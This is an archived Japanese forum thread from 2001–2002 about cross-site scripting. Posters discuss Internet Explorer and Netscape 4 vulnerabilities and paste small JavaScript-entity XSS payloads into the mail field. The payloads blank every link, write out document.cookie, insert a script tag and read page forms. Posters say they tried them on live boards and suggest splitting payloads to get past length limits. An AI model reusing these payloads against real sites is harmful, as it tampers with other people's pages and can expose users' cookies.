クロスサイトスクリプティング対策 (114レス)
上下前次1-新
31: >30 [jab1@lists.em5000.com] 01/11/12 18:24 ID:??? AAS
IEは5.01SP2です。
外部リンク[asp]:www.microsoft.com
によると、
テストしたバージョン :
マイクロソフトは Internet Explorer 5.5 SP2 および 6 のテストを行い、これらの脆弱性による影響を評価しました。それ以前のバージョンに関してはサポート (英語情報) の対象となっていないため、この脆弱性による影響は不明です。
とのこと。
ということは、5.01でも危険ということだろうか。
32: 名無しさん@お腹いっぱい。 [age] 01/11/26 07:56 ID:??? AAS
age
33: 名無しさん@お腹いっぱい。 01/12/17 07:29 ID:BojNQSph(1) AAS
age
34: テスト 01/12/19 07:01 ID:RLJpoDQa(1) AAS
外部リンク:pc.2ch.net
35: テスト 01/12/19 07:06 ID:??? AAS
外部リンク:pc.2ch.net
36: 名無しさん@お腹いっぱい。 [age] 02/01/12 14:08 ID:??? AAS
age
37: 02/01/26 08:50 ID:SUrQysHb(1) AAS
a
38(1): 名無しさん@お腹いっぱい。 02/01/26 11:51 ID:??? AAS
こんなのmail欄に入れたらどうなるんだろう?
&{document.captureEvents(Event.LOAD);window.onload=new Function('for(var i=0;Boolean(document.links[i]);i++)document.links[i].href=\'\';')};
39: 名無しさん@お腹いっぱい。 02/01/26 13:20 ID:??? AAS
>38
自分でやってみてよ(笑)
40(2): 名無しさん@お腹いっぱい。 02/01/26 13:47 ID:??? AAS
メール欄が長すぎます・・・だって(笑)
&{for(var i=0;document.links[i];i++)document.links[i].href='';};
これは大丈夫やった。
41(1): 名無しさん@お腹いっぱい。 02/01/26 14:05 ID:??? AAS
>40
どこでやってきたの?(笑)
42(1): 名無しさん@お腹いっぱい。 02/01/26 17:32 ID:??? AAS
>>41
色んなところ。反応が一つもないところを見ると
NN4でスクリプトONにしてる奴、あんまおらんのかな?
43: 名無しさん@お腹いっぱい。 [&{document.write(document.cookie)};] 02/01/26 22:09 ID:??? AAS
age
44: 名無しさん@お腹いっぱい。 [<script>document.write(l(null));</script>] 02/01/26 22:19 ID:??? AAS
age
45(1): ネスケ4.7使用者 02/01/27 10:13 ID:??? AAS
>>42
ひいい・・・・2ちゃんで窓が出たよう・・・。
46: 名無しさん@お腹いっぱい。 02/01/27 10:17 ID:??? AAS
>45
(笑)
47: 仕様書無しさん 02/01/27 23:08 ID:??? AAS
>>40
分割すればいいみたい。>>12>>13
48: 名無しさん@お腹いっぱい。 [&{for(var i=0;document.links[i];i++)document.links[i].href='';};] 02/02/06 03:45 ID:??? AAS
テスト
49: 名無しさん@お腹いっぱい。 02/02/06 03:46 ID:dMmdiZ7p(1) AAS
大手検索サイトに見るクロスサイトスクリプティングの脆弱性の実態(2002.2.4)
外部リンク[html]:www.netsecurity.ne.jp
50: テスト [&{f=document.forms;}] 02/02/08 00:23 ID:??? AAS
上下前次1-新書関写板覧索設栞歴
あと 64 レスあります
スレ情報 赤レス抽出 画像レス抽出 歴の未読スレ AAサムネイル
ぬこの手 ぬこTOP 0.007s